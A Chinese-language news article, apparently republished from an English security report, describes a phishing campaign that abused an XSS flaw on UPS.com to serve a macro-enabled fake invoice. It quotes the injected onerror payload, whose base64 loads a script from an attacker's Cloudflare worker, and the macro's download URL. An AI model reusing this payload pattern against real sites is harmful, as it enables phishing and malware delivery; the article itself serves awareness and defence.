资讯专栏INFORMATION COLUMN

“以假乱真” 网络钓鱼活动巧妙使用 UPS.com XSS 漏洞分发恶意软件

KoreyLee / 2120人阅读

摘要:此漏洞允许威胁行为者通过远程工作人员分发恶意文档,但使其看起来像是直接从下载的。目前显示,的跨站漏洞已经修复。而以上钓鱼攻击利用的是中第二普遍的安全问题,存在于近三分之二的应用中。

.markdown-body{word-break:break-word;line-height:1.75;font-weight:400;font-size:15px;overflow-x:hidden;color:#333}.markdown-body%20h1,.markdown-body%20h2,.markdown-body%20h3,.markdown-body%20h4,.markdown-body%20h5,.markdown-body%20h6{line-height:1.5;margin-top:35px;margin-bottom:10px;padding-bottom:5px}.markdown-body%20h1{font-size:30px;margin-bottom:5px}.markdown-body%20h2{padding-bottom:12px;font-size:24px;border-bottom:1px%20solid%20#ececec}.markdown-body%20h3{font-size:18px;padding-bottom:0}.markdown-body%20h4{font-size:16px}.markdown-body%20h5{font-size:15px}.markdown-body%20h6{margin-top:5px}.markdown-body%20p{line-height:inherit;margin-top:22px;margin-bottom:22px}.markdown-body%20img{max-width:100%}.markdown-body%20hr{border:none;border-top:1px%20solid%20#ffffd;margin-top:32px;margin-bottom:32px}.markdown-body%20code{word-break:break-word;border-radius:2px;overflow-x:auto;background-color:#fff5f5;color:#ff502c;font-size:.87em;padding:.065em%20.4em}.markdown-body%20code,.markdown-body%20pre{font-family:Menlo,Monaco,Consolas,Courier%20New,monospace}.markdown-body%20pre{overflow:auto;position:relative;line-height:1.75}.markdown-body%20pre>code{font-size:12px;padding:15px%2012px;margin:0;word-break:normal;display:block;overflow-x:auto;color:#333;background:#f8f8f8}.markdown-body%20a{text-decoration:none;color:#0269c8;border-bottom:1px%20solid%20#d1e9ff}.markdown-body%20a:active,.markdown-body%20a:hover{color:#275b8c}.markdown-body%20table{display:inline-block!important;font-size:12px;width:auto;max-width:100%;overflow:auto;border:1px%20solid%20#f6f6f6}.markdown-body%20thead{background:#f6f6f6;color:#000;text-align:left}.markdown-body%20tr:nth-child(2n){background-color:#fcfcfc}.markdown-body%20td,.markdown-body%20th{padding:12px%207px;line-height:24px}.markdown-body%20td{min-width:120px}.markdown-body%20blockquote{color:#666;padding:1px%2023px;margin:22px%200;border-left:4px%20solid%20#cbcbcb;background-color:#f8f8f8}.markdown-body%20blockquote:after{display:block;content:""}.markdown-body%20blockquote>p{margin:10px%200}.markdown-body%20ol,.markdown-body%20ul{padding-left:28px}.markdown-body%20ol%20li,.markdown-body%20ul%20li{margin-bottom:0;list-style:inherit}.markdown-body%20ol%20li%20.task-list-item,.markdown-body%20ul%20li%20.task-list-item{list-style:none}.markdown-body%20ol%20li%20.task-list-item%20ol,.markdown-body%20ol%20li%20.task-list-item%20ul,.markdown-body%20ul%20li%20.task-list-item%20ol,.markdown-body%20ul%20li%20.task-list-item%20ul{margin-top:0}.markdown-body%20ol%20ol,.markdown-body%20ol%20ul,.markdown-body%20ul%20ol,.markdown-body%20ul%20ul{margin-top:3px}.markdown-body%20ol%20li{padding-left:6px}.markdown-body%20.contains-task-list{padding-left:0}.markdown-body%20.task-list-item{list-style:none}@media%20(max-width:720px){.markdown-body%20h1{font-size:24px}.markdown-body%20h2{font-size:20px}.markdown-body%20h3{font-size:18px}}

一个巧妙的网络钓鱼活动利用UPS.com中的XSS漏洞来推送虚假和恶意的“发票”Word%20文档。

UPS快递公司(UPS%20Express,联合包裹服务公司)是世界上最大的快递承运商与包裹递送公司。公司创办1907年,每天在全球200多个国家和地区提供物流服务,年营业额超过500亿美元。

网络钓鱼骗局最初是由安全研究人员丹尼尔·加拉格尔发现的,他假装是一封来自UPS的电子邮件,声称一个包裹有“例外”,需要客户取走。

这次网络钓鱼攻击的突出之处在于,威胁行为者利用UPS.com的跨站攻击漏洞,将该网站的常规页面修改为看起来像一个合法的下载页面。

此漏洞允许威胁行为者通过远程Cloudflare工作人员分发恶意文档,但使其看起来像是直接从UPS.com下载的。

剖析%20UPS%20网络钓鱼骗局

这个电子邮件充满了大量的合法链接,没有执行恶意行为。然而,这个追踪号码是一个链接到UPS网站的链接,其中包含一个XSS漏洞,当页面打开时,该漏洞会向浏览器注入恶意JavaScript。

UPS 网络钓鱼电子邮件

当前无法加载图像,因为攻击者的站点已关闭

下面可以看到用于跟踪号码的URL经过清理后的版本,原始的URL被进一步混淆了。

网络钓鱼诈骗中使用的URL

这个URL有两个有趣的字符串用作攻击的一部分,其中第一项是以下base64编码的字符串:

MSBqVTU3IE4zM2QgNzAgbTRLMyA3aDE1IFVSTCA0IGwxNzdsMyBMMG45M3IgNzAgSDFEMyBuM3g3IHFVM3JZIFA0UjRNLCB5MHUgNExSMzREeSBLbjB3IFdoWSA7KQ==

base64字符串包含来自威胁参与者的注释,该注释有助于解释该字符串用于使URL变长,以隐藏附加到URL末尾的XSS利用查询参数。

1%20jU57%20N33d%2070%20m4K3%207h15%20URL%204%20l177l3%20L0n93r%2070%20H1D3%20n3x7%20qU3rY%20P4R4M,%20y0u%204LR34Dy%20Kn0w%20WhY%20;)

第二点是当用户访问UPS.com网站时注入的JavaScript跨站漏洞。

img%20src="x"%20onerror="Function(atob("JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ=="))()

atob()函数中解码的base64字符串包含Cloudflare工作人员脚本的URL,该漏洞将加载该脚本。

$.getScript("m.media-amazon.workers.dev/js")

Gallagher在Urlscan上捕获的Cloudflare工作人员脚本,将导致UPS页面显示一条消息,表明有文件正在下载。

Cloudflare 工作脚本用作 UPS XSS 攻击的一部分

XSS漏洞注入的Cloudflare worker脚本将导致UPS网站显示下载页面,如下所示。

利用导致UPS页面显示下载屏幕

最终,该页面将从攻击者的Cloudflare项目下载恶意的Word文档[VirusTotal]。

这种网络钓鱼活动手段非常聪明,因为用户访问URL将看到一个合法的ups.com%20URL提示下载发票,这种策略可能会使受害者在打开发票时少一些怀疑,认为这是UPS的真实文件。

目前显示,UPS.com的跨站漏洞已经修复。

神秘的假“发票”文件

下载的文件名为“invoice_1Z7301XR1412220178”,假装是UPS的运输发票。当打开文档时,所有文本都将无法读取,并且文档会提示用户“启用内容”以正确查看它。

恶意发票word文档

启用后,宏将尝试下载文件divine-bar-3d75.visual-candy.workers.dev/blackhole.p…

但是,此URL不再有效,因此无法查看有效负载。

伪造的 UPS 发票中的宏

这种网络钓鱼骗局说明了威胁行为者在散布恶意文件时,不断在发展和创新其技术手段,虽然邮件发送者清楚地显示了一个可疑域名,但由XSS漏洞允许URL和下载页面从UPS合法出现,这会让很多人信以为真。

根据CNVD(国家信息安全漏洞共享平台)统计,软件漏洞比例最高占全部网络漏洞的80%,而在OWASP TOP 10安全漏洞中,60-70%的安全漏洞类型都是通过源代码静态分析技术检测出来的,如XSS、注入漏洞、XXE等。而以上钓鱼攻击利用的XSS是OWASP TOP 10中第二普遍的安全问题,存在于近三分之二的应用中。自动化技术可以自动发现一些XSS问题,特别是在一些成熟的技术中,如PHP、ASP.NET等。因此在软件开发过程中,为了加强网络安全建设提高软件安全性,有必要通过静态代码检测等工具检测代码缺陷及运行时缺陷,并查找更多的已知/未知深度安全漏洞并及时修复,这不但为现有的网络防护手段做好重要补充,而且也能将安全问题修复成本降至最低。

参读链接:

www.woocoom.com/b021.html?i…

www.bleepingcomputer.com/news/securi…

www.99lb.net/8382b.html

文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。

转载请注明本文地址:https://www.ucloud.cn/yun/118560.html

相关文章

  • 金融科技行业网络安全威胁概览

    摘要:在众多端点威胁中,针对金融部门的最常见的持续攻击是网络钓鱼和勒索软件攻击。通过研究,影响金融行业的勒索软件攻击和数据泄露的趋势表明,勒索软件组是最活跃的。针对金融机构的累计攻击次数达起,涉及个勒索软件组织。 .markdown-body{word-break:break-word;line-height:1.75;font-weight:400;font-size:15px;ove...

    xietao3 评论0 收藏0
  • [面试专题]前端需要知道的web安全知识

    摘要:攻击方式端口扫描攻击洪水攻击洪水攻击跳转攻击防范手段保证服务器系统的安全确保服务器软件没有任何漏洞,防止攻击者入侵。 前端需要知道的web安全知识 标签(空格分隔): 未分类 安全 [Doc] Crypto (加密) [Doc] TLS/SSL [Doc] HTTPS [Point] XSS [Point] CSRF [Point] 中间人攻击 [Point] Sql/Nosql ...

    ivydom 评论0 收藏0

发表评论

0条评论

最新活动
阅读需要支付1元查看
<